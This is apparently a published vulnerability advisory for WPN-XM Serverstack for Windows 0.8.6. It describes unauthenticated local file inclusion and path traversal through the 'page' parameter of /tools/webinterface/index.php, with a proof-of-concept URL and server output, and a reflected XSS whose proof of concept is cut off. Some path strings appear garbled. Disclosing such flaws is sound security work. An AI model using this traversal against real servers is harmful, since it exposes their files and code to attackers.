Authored by Rafael Pedrero

WPN-XM Serverstack for Windows version 0.8.6 suffers from cross site scripting, local file inclusion, and path traversal vulnerabilities.

# Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage:
# Software Link :
# Tested Version: 0.8.6
# Tested on: Windows 10 using XAMPP

# Vulnerability Type: Local File Inclusion (LFI) & directory traversal
(path traversal)

CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22

Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows
unauthenticated directory traversal and Local File Inclusion through the
parameter in an /tools/webinterface/index.php?page=............hello
(without php) GET request.

Proof of concept:

To detect: http://localhost/tools/webinterface/index.php?page=)

The parameter "page" can be modified and load a php file in the server.

Example, In C::hello.php with this content:

C:>type hello.php
echo "HELLO FROM C:hello.php";

To Get hello.php in c: :

Note: hello without ".php".

And you can see the PHP message into the browser at the start.


HELLO FROM C:hello.php<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns="">
<meta charset="utf-8" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">

<title>WP?-XM Server Stack for Windows - 0.8.6</title>
<meta name="description" content="WP?-XM Server Stack for Windows -
<meta name="author" content="Jens-André Koch" />
<link rel="shortcut icon" href="favicon.ico" />

# Vulnerability Type: reflected Cross-Site Scripting (XSS)

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the
/tools/webinterface/index.php, in multiple parameters.

Proof of concept: